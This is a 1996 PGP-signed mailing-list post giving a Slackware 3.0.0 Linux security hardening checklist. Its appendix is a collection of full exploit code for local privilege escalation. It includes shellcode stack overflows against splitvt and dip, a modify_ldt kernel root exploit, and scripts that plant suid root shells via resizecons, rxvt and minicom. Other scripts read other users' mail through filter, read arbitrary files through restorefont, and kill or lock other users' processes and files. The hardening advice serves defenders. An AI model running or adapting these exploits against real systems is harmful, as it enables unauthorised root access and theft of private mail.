[ale] Slackware 3.0.0 todo
Jacob Langseth
dragon at cc.gatech.edu
Sun May 19 04:02:26 EDT 1996
-----BEGIN PGP SIGNED MESSAGE-----
[cc'd to 2600 & ALE as it may be of interest]
Alright... here's my Slackware 3.0.0 todo list. After you read through
this, you'll see why I went w/ Debian 1.1.
Be aware that this is nothing more than a collection of personal notes --
it's rough. Also worth noting is that this is directed towards Slackware;
it doesn't even attempt to cover the slew of bugs in early Redhat
distributions, the couple in Caldera, cron under early Debians, etc.
Maybe one day I'll clean it up and stick it on a web page or something...
- -jwl 96.05.19
>----------------------------------------------------------------------<
Linux Security Checklist -- Jacob Langseth <jacob at esisys.com>
[written in preparation to a slackware 3.0.0 upgrade]
>----------------------------------------------------------------------<
Comments, additions, corrections, etc welcome...
[This really should be in hypertext]
########################################################################
# Linux Installation Checklist
-> denotes I haven't yet implemented a script to accomplish this
Slackware 3.0.0
Minimal install:
a, ap, d, f, k, n, bsdgames.tgz from y (for fortune)
Extended packages:
tcl, y, Xwindoze
Post Installation
set root password
recompile kernel to related drivers only
disable unecessary services in /etc/inetd.conf
(netstat, systat, rsh, rlogin, uucp, nntp, etc)
configure /etc/rc.d/* (comment out rc.cdrom, configure host name,
disable starting of unnecessary services, add brc.logs)
(remove erroneous '!' from rc.6 (about fsck being forced))
configure /etc/securetty to allow root logins only on console/dialins
set permissions in /var/log
install /bin/login wrapper (strip LD_* ENV variables)
guard against alternate-library exploit [1]
upgrade libraries to protect against snprintf stack overwrite
(patches syslog(2) hole, see 8lgm advisory)
libc-5.3.12
prevent syslog(2) stack overwrite root exploit
ld.so-1.7.14, bin-utilsXX, procps-0.99a, latest kernel...
replace klogd and syslogd w/ versions protected vs stack overwrite
(believe I retrieved it from a CERT archive amongst an
libc patch... should check log file for exact location)
patch mailx 5.5 package
prevent tmp file race condition [2]
patch splitvt
guard against stack overwrite root exploit [4]
patch dip
guard against stack overwrite root exploit [5]
patch kernel to prevent anyone binding to a previously used port
and snarfing packets (use latest kernel) [netcat-1.10]
make sure /sbin/dump is not SUID root (Redhat 2.1) -- can be used
to read arbitrary files.
patch rxvt (chmod 0755 to get rid of SUID privs -- uses
a popen() w/o dropping privs)
Only a problem if X-Windows is installed [6]
patch filter (chmod 0644 it until a patch is released -- can be used
to read anyone's mail in /var/spool/mail) [7]
until the next release of X11R6 is out, create a seperate group for
users truly TRUSTED to use x-windows.
chmod o-x /usr/X11R6/bin/X86F_*
users may overwrite arbitrary files
if installing mgetty, upgrade to latest version
fax_id is passed unchecked to a system() call
patch updatedb
guard against full file list by any user
(execute cron as daemon or nobody)
patch restorefont hole
guard against any user being able to read first 8k
of any file from console [8]
patch resizecons hole
root exploit, chmod 0755 [9]
upgrade minicom to 1.74 version (if S[UG]ID, these privs may be
stolen in versoin before 1.73) [10]
compile PGP elm (prefferably PL25 PGP3)
guard against symlink hacks [11]
install pppd-2.2.0f
take md5 prints of all binaries, keep on read-only media (floppy), along
with a copy of md5sum. check via cron regularly
configure FTP directory
set ownerships and permissions, link tar and gzip, put up
bogus etc/passwd and etc/group files, limit number of
users; ftpaccess: set nodirs, make sure uploads can't be
retrieved
make sure MS-DOS partition is in a secure location (I use /root/mnt)
to prevent total-user access
install security apps
cops 1.04+ (local security checker)
Crack 4.1 (password checker)
ssh-1.2.13 (Secure Shell -- a must have)
PGP 2.6.2 (Pretty Good Privacy)
(w/ ELF patch)
swatch (perl system log watcher)
npasswd_boulder+l (proactive password checker)
tcpdump 3.0.3-3 (monitor ethernet traffic)
lsof (list open files)
...
setup security cronjobs
pluschk.pl (checks .rhosts for '+'s)
suid.chk (checks for SUID programs)
probably should get perl version working
passwdchk.sh (checks for bad passwords)
syschk.pl (checks for mail or .files in accounts
that shouldn't have them (such as bin, sync, etc)
- -> md5chk (warns when md5 hashes change)
replace daemons
fingerd w/ patched cfingerd 1.0.3
non-host forwarding, can deny user list requests,
immune to the @@@@@ bug
in.talkd w/ anti-flash+bombproof version
prevents users from being flashed
pop3d w/ patched pop3d-1.007
ftp://ninja.techwood.org/pub/linux/security/modified/pop3d-1.007a.diff.gz
disconnect after 3 failed logins, log username on
failures, do not display mail stats on failure
need to patch mktemp() prob [3]
disable user access to lpr (if user access is required, make sure
lpr* is patched)
disable NFS (at least verify latest NFS code is being used, always use
root squash and read only if possible, only export what must be)
default NFS in slack3.0 doesn't honor ro attribute
install assorted User Oriented packages
procmail (mail filter)
sendmail 8.7.5 w/ smrsh (smap[d]?)
add noexpn and needvrfyhelo to sendmail.cf
lynx (text based web browser)
netscape (graphical web browser)
irc (irc client)
metamail (for non-ascii mail)
- -> disable user access to standard ping (tends to get abused)
replace with one in /usr/local/bin which will report if
a host is alive, or will report error
secure Xwindows
add log_window (tty5)
configure /etc organization, hostname, profile, skel/
configure /usr/lib/man.config
gzip -r9 /usr/doc (compress documentation -- save space)
add 'linux' entry to /etc/termcap (console alias)
...
- --
Holes I'm not sure have been patched in 3.0.0:
lpr -r -s can be used to remove any file, among other things
ghostscript holes
- --
Pre 3.0.0 security patches, in addition to the above:
early sendmail/smail versions (should use 8{.7.5|.6.13})
wu-ftpd site exec [~9]
minicom v 1.74
check for unexpected accounts in /var/lib/minicom/minicom.users
< 1.71 root exploit possible, < 1.73 S[UG]ID theft possible
NFS (update to latest/securist code available)
ppp 2.2.0f (or disable SUID bit)
prevents local user spoofing any machine on local network
upgrade to kernel 1.2.13 (<- still has probs. best is latest)
prevents various file-locking techniques
prevents any user from killing most other processes w/ SIGURG
prevent users binding to an inuse socket not owned by them
dip able to read any file, stack overwrite vulnerability
selection v1.7 -- create/destroy arbitrary files (pid in /tmp)
INN 1.4sec
control messages parsed by shell scripts
PPP login scripts
HOWTO recommends ppp login be a shell script,
which are insecure as login shells 'cause ENV
BIND < xxxx -- remote cache replacement
cron (early debian was vulnerable, not slackware)
- --
Ancient:
rlogin -froot
at version before 2.7
libraries before XXXXX
if an entry such as +::.... is in /etc/passwd, anyone can su to root,
or if +user::: is used, anyone may su the user listed directly above
it in the password file w/o a password
if its before XXXX (need to find out a version number), there is no
UID==EUID check to see if an alternate library may be used
(allowing one to specify an alternate library to any SUID prog
on the system)
###############################
# Linux kernel security holes
1.3.xx
bind to an inuse socket not owned by your UID
modify_ldt() root exploit [12]
/proc file system
can open /proc/<PID>/mem, then exec a setuid/gid program
and not lose read permissions on the fd
1.2.xx
bind to an inuse socket not owned by your UID
modify_ldt() root exploit [12]
/proc file system
can open /proc/<PID>/mem, then exec a setuid/gid program
and not lose read permissions on the fd
MAP_DENYWRITE may be used to lock any file by any user [13]
1.2.11
SIGURG could kill processes not owned by the user [14]
1.2.10
/proc something
1.2.???
flock able to lock any file:
fd = open("/var/adm/wtmp", O_RDONLY);
flock(fd, LOCK_EX);
pause();
and no one can log in because login will block trying to get exclusive
access to wtmp. Kill this process and everything will be fine again.
/proc
> The permission and ownerships for the file descriptor entries in the fd
> subdirectories are wrong.
> The permission for such a file are (if the file was opened O_RDWR) readable
> and writable for all processes with the same euid as the process which owns
> these file descriptor CURRENTLY has.
> eg: A suid program which opened /dev/mem (O_RDWR) and later does a
> 'seteuid(getuid())' (like every svgalib program) allows every user to
> clone a read and writable fd to /dev/mem.
- --------------- Appendix (! chronological) -----------------
[1] exploit:
~musashi/stuff/src/misc/c/libroot-0.9/ (or recompiled libc-x.x.x)
fix:
/* This is a login wrapper that removes all instances of various
variables from the environment.
Original author: Lawrence R. Rogers
This is a modified version and is only partially based on the work
of the original author; Lawrence R. Rogers is not responsible for
this version.
NOTE: THIS PROGRAM MUST BE COMPILED STATICALLY TO BE EFFECTIVE
AGAINST EXPLOITATION. For example:
gcc -static -o login FILENAME
Where FILENAME is the name of the file to which you saved this.
To install this wrapper, first move `/bin/login' or
`/usr/bin/login' (make sure it is the one that telnetd (8)
executes) to `/bin/login.real' or whatever you defined
_PATH_LOGIN_REAL to be. Then replace the original with the
executable generated by compiling this file (again, make sure that
this executable is statically linked or it will be ineffective). */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
/* #include <syslog.h>
#ifndef SYSLOG_FACILITY
#define SYSLOG_FACILITY LOG_AUTHPRIV
#endif */ /* SYSLOG_FACILITY */
/* #ifndef SYSLOG_LEVEL
#define SYSLOG_LEVEL LOG_ALERT
#endif */ /* SYSLOG_LEVEL */
#ifndef _PATH_LOGIN_REAL
#define _PATH_LOGIN_REAL "/bin/login.real"
#endif /* _PATH_LOGIN_REAL */
/* This should be a list of environment strings that we want to allow
users to pass to login (1) (and possibly to the shell). These will
be matched using strncmp (3).
This list should really only contain the names of environment
variables that control display parameters, as any others should be
able to wait until the shell's rc files (e.g., `.login',
`.profile', `/etc/profile', etc.,) are executed. */
static const char *legal_env_strings[] =
{
"DISPLAY=",
"TERM=",
0
};
int
main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char **p1, **p2;
int i;
/* openlog (argv[0], LOG_PID, SYSLOG_FACILITY); */
for (p1 = p2 = envp; *p1; p1++)
{
int found = 0;
/* Traverse the list of legal environment strings. If we have a
match, pass it in envp; otherwise, send a warning to the
system logger. */
for (i = 0; legal_env_strings[i] && !found; i++)
{
if (!strncmp (*p1, legal_env_strings[i], strlen (legal_env_strings[i])))
found = 1;
}
if (found)
{
*p2++ = *p1;
}
/* else
{
syslog (SYSLOG_LEVEL,
"illegal environment string: `%s'\n", *p1);
} */
}
*p2 = 0;
/* closelog (); */
execve (_PATH_LOGIN_REAL, argv, envp);
perror (_PATH_LOGIN_REAL);
exit (1);
}
>>-----------------------------------<<
[2] mailx-5.5 race condition
/* This program creates temporary files used by mailx (/bin/mail under
Slackware 3.0), which can then be read by the program. This will
exploit 4 of the 5 temporary files, the final temporary file is a
tighter race condition, and is not handled by this code.
Following execution of this program with the process id of mail that
is running, execute 'tail -f /tmp/R*', redirecting to a file if desired,
and allow it to run until the mail process has exited. This can be easily
handled in a shell script, but is not included since it is not needed to
sufficiently demonstrate the security flaw.
*/
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
void exploit_mktemp(char *dest, char *prepend, char *pid)
{
int i;
strcpy(dest,prepend);
for(i=strlen(pid);i<6;i++)
strcat(dest,"0");
strcat(dest,pid);
dest[strlen(prepend)] = 'a';
}
main(int argc, char **argv)
{
char tmpf[5][80]; /* hold filename */
umask(0);
if(argc<2)
{
printf("mailbug racer\nSyntax: %s process-id\n",argv[0]);
return -1;
}
/* get mktemp filenames */
exploit_mktemp(tmpf[0],"/tmp/Re",argv[1]);
exploit_mktemp(tmpf[1],"/tmp/Rs",argv[1]);
exploit_mktemp(tmpf[2],"/tmp/Rq",argv[1]);
exploit_mktemp(tmpf[3],"/tmp/Rm",argv[1]);
/* create temporary files */
creat(tmpf[0],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
creat(tmpf[1],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
creat(tmpf[2],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
creat(tmpf[3],S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
}
>>-----------------------------------<<
[3] pop3d poor temp files
/* This program creates temporary files used by in.pop3d (/usr/sbin/in.pop3d
under Slackware 3.0), which can then be read by the program.
This race condition is NOT always successful, it may take extreme conditions
to ensure a high probability of success.
Dave M. (davem at cmu.edu)
*/
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
main(int argc, char **argv)
{
int race;
int i;
char fname[80], tmpf[80]; /* hold filename */
umask(0);
if(argc<1)
{
printf("pop3 racer\nSyntax: %s process-id\n",argv[0]);
return -1;
}
/* create tmp file to race creating */
strcpy(tmpf,"/tmp/pop3");
for(i=strlen(argv[1]);i<6;i++)
strcat(tmpf,"0");
strcat(tmpf,argv[1]);
tmpf[9] = 'a';
race = creat(tmpf,S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH);
while(1)
{
rename(tmpf,"/tmp/pop.exploit");
if(rename("/tmp/pop.exploit",tmpf) < 0)
{
printf("race lost - file created.\n"); /* catch 1/2 the losses */
break;
}
}
}
>>-----------------------------------<<
[4] splitvt -- root exploit -- SUID, stack overwrite
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main()
{
char eggplant[2048];
int a;
char *egg;
long *egg2;
char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *eggie = realegg;
egg = eggplant;
*(egg++) = 'H';
*(egg++) = 'O';
*(egg++) = 'M';
*(egg++) = 'E';
*(egg++) = '=';
egg2 = (long *)egg;
for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
egg=(char *)egg2;
for (a=0;a<0x40;a++) *(egg++) = 0x90;
while (*eggie)
*(egg++) = *(eggie++);
*egg = 0; /* terminate eggplant! */
putenv(eggplant);
system("/bin/bash");
}
>>-----------------------------------<<
[5] dip -- root exploit -- SUID, stack overwrite
/* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>
#define PATH_DIP "/usr/sbin/dip"
u_char shell[] = /* courtesy of avalon ;) */
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
u_long esp() { __asm__("movl %esp, %eax"); }
main()
{
u_char buf[1024];
u_long addr;
int i, f;
strcpy(buf, "chatkey ");
addr = esp() - 192;
for (i=8; i<128+16; i+=4)
*((u_long *) (buf+i)) = addr;
for (i=128+16; i<512; i++)
buf[i] = 0x90;
for (i=0; i<strlen(shell); i++)
buf[512+i] = shell[i];
buf[512+i] = '\n';
if ((f = open("temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) {
perror("temp.dip");
exit(0);
}
write(f, buf, 512+i);
close(f);
execl(PATH_DIP, "dip", "temp.dip", (char *)0);
}
>>-----------------------------------<<
[6] rxvt -- root exploit -- SUID, uses popen()
1. Set DISPLAY environment variable if necessary so you can use x
clients.
2. In user shell:
$ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
$ chmod +x /tmp/rxbug
$ rxvt -print-pipe /tmp/rxbug
3. In rxvt xclient:
$ cat
ESC[5i
ESC[4i
(The client will close at this point with a broken pipe)
4. $ /tmp/rxsh
# whoami
root
#
>>-----------------------------------<<
[7] filter -- read anyone's mail
#!/bin/sh
# This shell script exploits a problem with filter(1L)
# it will follow symbolic links, on a read allowing
# us to steal a users mail file.
#
# Usage: fread.sh victimsusername
#
# Contents will be stored in ~/victimsusername.mail
#
# Dave M. (davem at cmu.edu)
#
cp /var/spool/mail/$LOGNAME ~
cp /dev/null /var/spool/mail/$LOGNAME
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp
cat << _EOF_ >> /tmp/fread-msg.tmp
>From: Dave
To: $LOGNAME
Subject: Filter Exploit
_EOF_
echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp
/tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=
cp /var/spool/mail/$LOGNAME ~/$1.mail
cp ~/$LOGNAME /var/spool/mail
more ~/$1.mail
>>-----------------------------------<<
[8] restorefont -- read 8k of any file from console
#!/bin/sh
# This shell script exploits a problem with restorefont
# it reads a file into the video memory as the vga font
# and then writes the file back out from video memory
# thus allowing any user at console to read 8k of any file
# on a local filesystem.
#
# Usage: rfbug.sh filename-to-read filename-to-write
#
# Dave M. (davem at cmu.edu)
#
restorefont -w /tmp/deffont.tmp
restorefont -r $1
restorefont -w $2
restorefont -r /tmp/deffont.tmp
rm -f /tmp/deffont.tmp
>>-----------------------------------<<
[9] resizecons -- root exploit
#!/bin/sh
#
# wozzeck.sh
# exploits a security hole in /usr/bin/resizecons
# to create a suid root shell in /tmp/wozz on a
# linux Red Hat 2.1 system.
#
# by Dave M. (davem at cmu.edu)
#
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/bin/resizecons
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/313x37
This exploit is dedicated to
Wozz. Use it with care.
_EOF_
cat << _EOF_ > /tmp/restoretextmode
#!/bin/sh
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
_EOF_
/bin/chmod +x /tmp/restoretextmode
PATH=/tmp
echo ================ Executing resizecons
/usr/bin/resizecons 313x37
/bin/rm /tmp/restoretextmode
/bin/rm /tmp/313x37
if test -u /tmp/wozz
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi
>>-----------------------------------<<
[10] minicom -- root exploit (pre 1.71 version)
#include <stdlib.h>
#include <unistd.h>
void main() {
setreuid(0,0);
system("/bin/cp /bin/sh /tmp/mysh");
system("/bin/chmod 4777 /tmp/mysh");
}
Create a minicom script that will execute our program:
echo '! /tmp/gime' > /tmp/foo
Start minicom and type Control-A then G. Select C and enter
the name for our minicom script (/tmp/foo)
>>-----------------------------------<<
[11] elm -- possible root exploit -- symlink hack
cd /tmp ; ln -s ~target/<non_existant_file> mbox.target
>>-----------------------------------<<
[12] modify_ldt()
#include <linux/ldt.h>
#include <stdio.h>
#include <linux/unistd.h>
#include <signal.h>
#include <asm/sigcontext.h>
#define __KERNEL__
#include <linux/sched.h>
_syscall3 (int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)
#define KERNEL_BASE 0xc0000000
/* ------------------------------------------------------------------------ */
static __inline__ unsigned char
__farpeek (int seg, unsigned ofs)
{
unsigned char res;
asm ("mov %w1,%%gs ; gs; movb (%2),%%al"
: "=a" (res)
: "r" (seg), "r" (ofs));
return res;
}
/* ------------------------------------------------------------------------ */
static __inline__ void
__farpoke (int seg, unsigned ofs, unsigned char b)
{
asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"
: /* No results. */
: "r" (seg), "r" (ofs), "r" (b));
}
/* ------------------------------------------------------------------------ */
void
memgetseg (void *dst, int seg, const void *src, int size)
{
while (size-- > 0)
*(char *) dst++ = __farpeek (seg, (unsigned) (src++));
}
/* ------------------------------------------------------------------------ */
void
memputseg (int seg, void *dst, const void *src, int size)
{
while (size-- > 0)
__farpoke (seg, (unsigned) (dst++), *(char *) src++);
}
/* ------------------------------------------------------------------------ */
int
main ()
{
int stat, i;
struct modify_ldt_ldt_s ldt_entry;
FILE *syms;
char line[100];
struct task_struct **task, *taskptr, thistask;
pid_t ppid;
printf ("Bogusity checker for modify_ldt system call.\n");
printf ("Testing for page-size limit bug...\n");
ldt_entry.entry_number = 0;
ldt_entry.base_addr = 0xbfffffff;
ldt_entry.limit = 0;
ldt_entry.seg_32bit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
ldt_entry.read_exec_only = 0;
ldt_entry.limit_in_pages = 1;
ldt_entry.seg_not_present = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)
/* Continue after reporting error. */
printf ("This bug has been fixed in your kernel.\n");
else
{
printf ("Shit happens: ");
printf ("0xc0000000 - 0xc0000ffe is accessible.\n");
}
printf ("Testing for expand-down limit bug...\n");
ldt_entry.base_addr = 0x00000000;
ldt_entry.limit = 1;
ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
ldt_entry.limit_in_pages = 0;
stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
if (stat)
{
printf ("This bug has been fixed in your kernel.\n");
return 1;
}
else
{
printf ("Shit happens: ");
printf ("0x00000000 - 0xfffffffd is accessible.\n");
}
syms = fopen ("/System.map", "r");
if (!syms)
{
printf ("Couldn't open `/System.map' for reading.\n");
return 1;
}
while (1)
{
line[0] = 0;
fgets (line, sizeof (line) - 1, syms);
if (strlen (line) < 10)
{
printf ("Couldn't find the _task array symbol.\n");
fclose (syms);
return 1;
}
if (strcmp (line + 9, "D _task\n") == 0)
break;
}
fclose (syms);
task = (struct task_struct **) (KERNEL_BASE + strtol (line, 0, 16));
ppid = getppid ();
for (i = 0; i < NR_TASKS; i++)
{
memgetseg (&taskptr, 7, &task[i], sizeof (taskptr));
if (taskptr)
{
(char *) taskptr += KERNEL_BASE;
memgetseg (&thistask, 7, taskptr, sizeof (thistask));
if (thistask.pid == ppid)
{
thistask.uid = thistask.euid = 0;
thistask.gid = thistask.egid = 0;
memputseg (7, taskptr, &thistask, sizeof (thistask));
printf ("Shit happens: parent process is now root process.\n");
return 0;
}
}
}
printf ("Strange things happens -- no parent process found.\n");
return 1;
};
>>-----------------------------------<<
[13] MAP_DENYWRITE
/* exploits MAP_DENYWRITE kernel bug to lock any file on the system
*
* Invoke this as `./a.out < file-to-be-blocked'.
* Send it a signal when you want to unblock the file.
*/
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/mman.h>
int main(void) {
caddr_t a;
a= mmap(0,1,PROT_READ,MAP_DENYWRITE|MAP_FILE|MAP_SHARED,0,0);
if (a == (caddr_t)-1) { perror("mmap"); exit(1); }
printf("mapped at %p\n",a);
pause();
return 0;
}
>>-----------------------------------<<
[14] SIGURG
/*
This program, when run on most Linux systems (tested with 1.2.9,
but should work with versions at least up to 1.2.11 and 1.3.6),
will send SIGURG to specified process, even if you don't own it.
This signal (unless caught or ignored) will terminate the process,
so please don't do that without the permission from your system
administrator. Thank you.
Copyright (C) 1995 Marek Michalkiewicz
This program is free software, see the GNU General Public License
for more legalese... There is no warranty - after all, this bug
may be fixed soon :-).
This piece of code is probably not an example of proper programming
style - please don't look at it too closely. The intent is to show
a security hole in the Linux kernel.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define PORT 8765 /* just a random hopefully unused TCP port */
#define ERROR_CHECK(x, msg) do { \
if ((x) == -1) { \
perror(msg); \
exit(1); \
} \
} while (0)
int main(int argc, char *argv[])
{
int s, s1, child_pid;
struct sockaddr_in addr;
int one = 1;
char c = 0;
if (argc != 2) {
fprintf(stderr, "usage: %s pid\n", argv[0]);
exit(1);
}
ERROR_CHECK( s = socket(AF_INET, SOCK_STREAM, 0), "socket" );
ERROR_CHECK( setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one), "setsockopt" );
memset(&addr, 0, sizeof addr);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = INADDR_ANY;
ERROR_CHECK( bind(s, (struct sockaddr *) &addr, sizeof addr), "bind" );
ERROR_CHECK( listen(s, 1), "listen" );
ERROR_CHECK( child_pid = fork(), "fork" );
if (child_pid == 0) { /* child */
int pid_to_kill = atoi(argv[1]);
ERROR_CHECK( s1 = socket(AF_INET, SOCK_STREAM, 0), "child socket" );
ERROR_CHECK( connect(s1, (struct sockaddr *) &addr, sizeof addr), "child connect" );
ERROR_CHECK( ioctl(s1, FIOSETOWN, &pid_to_kill), "child ioctl" ); /* !!! */
ERROR_CHECK( write(s1, &c, 1), "child write" ); /* wake up blocked parent */
ERROR_CHECK( read(s1, &c, 1), "child read" );
_exit(0);
}
ERROR_CHECK( s1 = accept(s, NULL, NULL), "accept" );
ERROR_CHECK( read(s1, &c, 1), "read" ); /* block until child is ready */
ERROR_CHECK( send(s1, &c, 1, MSG_OOB), "send" ); /* this will send SIGURG */
return 0;
}
>>-----------------------------------<<
###EOF###
- --
/ "Meddle not in the affairs of dragons, for \
*}=={*}>======- thou art crunchy and go well with ketchup." -======<{*}=={*
\ <dragon at cc.gatech.edu> /
Musashi - - -=- Finger for PGP key -=- - - Musashi
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBMZ7Vg7t34LFBwvDtAQGyLwP+P6pnM0zPW4eNkXJP4ENOrYyGpf4vn9+U
u+jR7Act1vFtoCnBjf1ltAQqUBBD5dziU5PfZGsrQpax9YBN7py+oOg+rV0DzX7A
DWQyiRVHbm5HeozCCANywBFigPwN5jXeP1pOZpxU2hALNKyJAyAUX7VPQMKBr0ry
SjSUDIR+eeE=
=9XGx
-----END PGP SIGNATURE-----
More information about the Ale
mailing list